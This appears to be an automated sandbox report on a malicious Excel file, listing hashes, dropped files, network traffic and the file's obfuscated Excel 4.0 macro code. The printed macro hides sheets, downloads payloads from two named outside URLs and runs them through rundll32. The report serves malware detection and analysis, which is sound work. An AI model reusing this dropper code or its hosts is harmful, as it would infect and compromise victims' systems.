| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| psq.com.mx | statistic-1496367785.xls | malicious | 162.241.2.112 |
| | 33c179ca_by_Libranalysis.xls | malicious | 162.241.2.112 |
| | 7fb953aa_by_Libranalysis.xls | malicious | 162.241.2.112 |
| | statistic-462462953.xls | malicious | 162.241.2.112 |
| | statistic-1403316517.xls | malicious | 162.241.2.112 |
                                                                                                                                                                                                                  statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  statistic-260077031.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  statistic-260077031.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 162.241.2.112
                                                                                                                                                                                                                  academy.haleemcampus.com33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  33c179ca_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  7fb953aa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-462462953.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-462462953.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-1403316517.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-260077031.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-260077031.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  5c89f585_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80
                                                                                                                                                                                                                  statistic-1066846651.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 108.179.232.80

                                                                                                                                                                                                                  ASN

                                                                                                                                                                                                                  JA3 Fingerprints


                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\0A8CE175-D39D-43AE-8F1B-CA84388C02A0
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):135209
                                                                                                                                                                                                                  Entropy (8bit):5.363078467391509
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:pcQIKNgeBTA3gBwlpQ9DQW+zoY34ZliKWXboOidX5E6LWME9:9EQ9DQW+zwXO1
                                                                                                                                                                                                                  MD5:F36D695FFC65C02CF6642D107DE3436E
                                                                                                                                                                                                                  SHA1:A6E39AE62834265B4937B554FF799614E6CBD2BC
                                                                                                                                                                                                                  SHA-256:0A1F0B3E72F02FBF65827B4356D516DA6D321ACB4EB356F16657728C82584E94
                                                                                                                                                                                                                  SHA-512:E21B9C58D9A8AE3B1CA665CB890568370C080F42E41072CED05ED5CA5C4A7507ADF0AC349300276F24EC4CDCE5BFB3D88FF53AB15A14443EFB4FE6D5D3BD9850
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-29T15:47:13">.. Build: 16.0.14228.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\BDB40000
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):82869
                                                                                                                                                                                                                  Entropy (8bit):7.897086363765867
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:ILMCBgFqO57Lav5F/U2SiwFNfZ7pjS8ZiYhuiNde9kJY:04qO5PWzUWwtNm8ZUmY
                                                                                                                                                                                                                  MD5:30C64BA689D114C1B1F07726F4B0F643
                                                                                                                                                                                                                  SHA1:6E453A1835195371901BDEC66BDDE4EAAC7B0DD2
                                                                                                                                                                                                                  SHA-256:E9806EDFE4032C38F466EC4CB002167D14B5076F4197EBE861053E1A3BE5ECC9
                                                                                                                                                                                                                  SHA-512:A285BEF29AB022AC67BB0E0D55E0A9DD1E04F16D301C5EA081AC7B7D6AA598875692E742FCAB3285A61BA2C51EC632AE8BAC04CE5E1BE2603899763B4512510E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Tue Jun 29 14:47:14 2021, atime=Tue Jun 29 14:47:14 2021, length=12288, window=hide
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):904
                                                                                                                                                                                                                  Entropy (8bit):4.655853070338881
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:8vVCXUM7t7gcduCH2BvOpM4IiujBF+WrjAZ/DYbDMSeuSeL44t2Y+xIBjKZm:8W9qmpTyVAZbcDG7aB6m
                                                                                                                                                                                                                  MD5:C28D5CC4959D0E1E0857E734A7985781
                                                                                                                                                                                                                  SHA1:02DD24C036CD987F04E14B31EF9ECDEDF4B75E50
                                                                                                                                                                                                                  SHA-256:E1050433736C4F3D25755ECD8A6E34798FA29A618D0A58BC759B4D208756C19A
                                                                                                                                                                                                                  SHA-512:B48A5C3C3280FD958E5042B35A152E976770ED7C9AD959048870DF6790740DF9007302E66BDEDCBC0D33523995DDF3E74172DA641AC48EDB37D7638D779DD23C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):113
                                                                                                                                                                                                                  Entropy (8bit):4.71317481637129
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:oyBVomMnUTWeS4UOytUTWeS4UmMnUTWeS4Uv:dj6nUTL8tUTLinUTLK
                                                                                                                                                                                                                  MD5:827572951026F0F9437E31D866B8FF08
                                                                                                                                                                                                                  SHA1:0B6A363D618B5E1D031EE6E5DCE5C18A9B13BBE6
                                                                                                                                                                                                                  SHA-256:493A258224290D5C5BB92DC4C57E3B8E36D4BE213CC9F3744D69D345F03B843B
                                                                                                                                                                                                                  SHA-512:F224FE824B181BEA88A282AFDD4528CF59F8952BD571C595AC6E6E3F2E7E9FA499B9E8FC5DE623B02501C0D341A82B3A7053B7550746CA36CDC6EBF1FBA662DB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: Desktop.LNK=0..[xls]..statistic-1496367785.LNK=0..statistic-1496367785.LNK=0..[xls]..statistic-1496367785.LNK=0..
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\statistic-1496367785.LNK
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:54 2020, mtime=Tue Jun 29 14:47:15 2021, atime=Tue Jun 29 14:47:15 2021, length=176128, window=hide
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):4.704393826342388
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:8Ogw9qmp5Y5MiWlOkMkBB6pOgw9qmp5Y5MiWlOkMkBB6:8hcZiWlOdwKhcZiWlOdw
                                                                                                                                                                                                                  MD5:1DBF118D07425F742972F80B6F479464
                                                                                                                                                                                                                  SHA1:348393828935581579897E182E3872D7033C7054
                                                                                                                                                                                                                  SHA-256:8996BA14F72BBE59CC466D0F4AB1911D640C453A9EC210C47DD791D3301037AB
                                                                                                                                                                                                                  SHA-512:9A2021007A4621460404B0BDC89CC20E55E35F7F26F6F4AAAFD5F3961AA10539D9D8122016337C16769CE55F360D49B2CF54EF351A671C799CA325D283135453
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22
                                                                                                                                                                                                                  Entropy (8bit):2.9808259362290785
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                                                                  MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                                                                  SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                                                                  SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                                                                  SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                                                                                  Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                                                                  C:\Users\user\Desktop\7EB40000
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):222635
                                                                                                                                                                                                                  Entropy (8bit):5.628519548551312
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:a8rmdAIByzElbSRg3WCbgBeP5NmPTdbsizCnQC6VqCJ6KS8rmdAIByzElbSRg3WS:uLnQC6sCRY
                                                                                                                                                                                                                  MD5:6F378E0FCB99595324566C5A91985656
                                                                                                                                                                                                                  SHA1:9059F775A49511C7A614F831EC90841008171C0D
                                                                                                                                                                                                                  SHA-256:3026EAEDD6AFA59DF4C54D4CF1E1EE6A4891F32CC83B2B1AA95426B0F6458763
                                                                                                                                                                                                                  SHA-512:467D5668E72E6D3B891D261512CDDC4A53742B06E2D345BA8180F46FEFA23958BD77D0D6E188624B3F0132A3DB738C108BF774BD918A3571F55CFB98E9B42C06
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: van-van, Last Saved By: Grog, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Fri May 21 09:07:02 2021, Security: 0
                                                                                                                                                                                                                  Entropy (8bit):2.0857713013138395
                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                                                  File name:statistic-1496367785.xls
                                                                                                                                                                                                                  File size:536064
                                                                                                                                                                                                                  MD5:7fb48e03b899f792be6c3118a46c5c8f
                                                                                                                                                                                                                  SHA1:55445d13cd433121c6c2bfb31414b08e31e28a65
                                                                                                                                                                                                                  SHA256:1c818433e1ca49729f987b3f060b2133c8375f8164181c4684600a278ee6033f
                                                                                                                                                                                                                  SHA512:e950fe3278277996dbfb9f7f80bd03976793ba4967f272612f901eea83e1284a512104348ab14d3028dcac0ef9cd527dde9ce22323c90fa080fae3fcdc79905f
                                                                                                                                                                                                                  SSDEEP:6144:C6tIrWqrY5O3NMHGRYc9u/YRTP85XbDu1XYiXxy:Ru1XPE

                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                  Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                                                  Static OLE Info

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Document Type:OLE
                                                                                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                                                                                  OLE File "statistic-1496367785.xls"

                                                                                                                                                                                                                  Indicators

                                                                                                                                                                                                                  Has Summary Info:True
                                                                                                                                                                                                                  Application Name:Microsoft Excel
                                                                                                                                                                                                                  Encrypted Document:False
                                                                                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                                                                                  Contains Workbook/Book Stream:True
                                                                                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                                                                                  Flash Objects Count:
                                                                                                                                                                                                                  Contains VBA Macros:False

                                                                                                                                                                                                                  Summary

                                                                                                                                                                                                                  Code Page:1251
                                                                                                                                                                                                                  Author:van-van
                                                                                                                                                                                                                  Last Saved By:Grog
                                                                                                                                                                                                                  Create Time:2015-06-05 18:17:20
                                                                                                                                                                                                                  Last Saved Time:2021-05-21 08:07:02
                                                                                                                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                                                                                                                  Security:0

                                                                                                                                                                                                                  Document Summary

                                                                                                                                                                                                                  Document Code Page:1251
                                                                                                                                                                                                                  Thumbnail Scaling Desired:False
                                                                                                                                                                                                                  Contains Dirty Links:False

                                                                                                                                                                                                                  Streams

                                                                                                                                                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:4096
                                                                                                                                                                                                                  Entropy:0.298297266065
                                                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:4096
                                                                                                                                                                                                                  Entropy:0.277521975637
                                                                                                                                                                                                                  Base64 Encoded:False
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 521856
General
Stream Path: Book
File Type: Applesoft BASIC program data, first line number 8
Stream Size: 521856
Entropy: 2.01072652781
Base64 Encoded: True

                                                                                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                                                                                  ,,,"=WORKBOOK.HIDE(""Doc2"",1)",,,,,,"=WORKBOOK.HIDE(""Doc3"",1)",,,,,,"=WORKBOOK.HIDE(""Doc4"",1)",,,=BA17(),,,"=FORMULA(""U""&Doc2!BL28&Doc2!BL29&Doc2!BL30,Doc3!AY10)=RAND()=FACT(59)=FORMULA(Doc2!BJ39&before.4.4.52.sheet!BD17&Doc2!BJ43&Doc3!AY10&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY11&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY12&Doc2!BJ41&Doc2!BJ45&Doc2!BJ42&Doc2!BJ41&Doc3!AY13&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc2!BI24&Doc2!BJ41&Doc2!BJ45&Doc2!BJ45&Doc2!BJ44,Doc3!AW10)=SUMXMY2(452354,45245)",,,,,,"=FORMULA(Doc2!BJ39&before.4.4.52.sheet!BD17&Doc2!BJ43&Doc3!AY10&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY11&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY12&Doc2!BJ41&Doc2!BJ45&Doc2!BJ42&Doc2!BJ41&Doc3!AY14&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc2!BI24&""1""&Doc2!BJ41&Doc2!BJ45&Doc2!BJ45&Doc2!BJ44,Doc3!AW11)",,,,,,=GOTO(Doc3!AW8),,,"=FORMULA(""=""&Doc2!BG29&Doc2!BG36&Doc2!BG37&Doc2!BG38&Doc2!BG39&""2 ""&Doc2!BI24&Doc2!BG41&Doc2!BG42&Doc2!BG43&Doc2!BG44&Doc2!BG33,Doc3!AW14)",,,,,,"=FORMULA(""=""&Doc2!BG29&Doc2!BG36&Doc2!BG37&Doc2!BG38&Doc2!BG39&""2 ""&Doc2!BI24&""1""&Doc2!BG41&Doc2!BG42&Doc2!BG43&Doc2!BG44&Doc2!BG33,Doc3!AW15)",,,,,,,,,,,,=BD4(),,,,,,,,,,,,,,,,,,,,,CALL,,,"=FORMULA(Doc2!BH20&Doc2!BI20&Doc2!BJ20&Doc2!BK20,Doc3!AY13)",,,,,,"=FORMULA(""U""&Doc2!BL28&Doc2!BL32&Doc2!BJ31&Doc2!BL31&Doc2!BL34&Doc2!BJ32&""e""&""A"",Doc3!AY11)",,,,,,,,,,,,"=FORMULA(Doc2!BH21&Doc2!BI21&Doc2!BJ21&Doc2!BK21,Doc3!AY14)",,,,,,,,,,,,"=FORMULA(Doc2!BM34&Doc2!BM29&Doc2!BM30&Doc2!BM33,Doc3!AY12)",,,,,,=BG8(),,,,,,
                                                                                                                                                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,tps://,psq.com.mx/hDHqOp5,8UBQv/filter.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,tps://,academy.haleemcampus.co,m/GxaCS5azoZlJ/filter.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\flamo.vir,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,EXEC,,,0,,LM,JC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,CB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\bubl.cmi,,,wnl,,oadT,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,LDo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",,,,,,B,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,J,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""r",,,,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,un,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,,,=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",Dl",,,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,lRegi,,,"
,",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ster,,,"(""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Server,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,

                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                  TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.162003040 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.321614027 CEST44349741108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.321721077 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.322243929 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.323024988 CEST44349739108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.479310989 CEST44349741108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.479876041 CEST44349741108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.479964972 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.481251001 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.486433983 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.643575907 CEST44349741108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:22.044697046 CEST44349741108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:22.044873953 CEST49741443192.168.2.4108.179.232.80
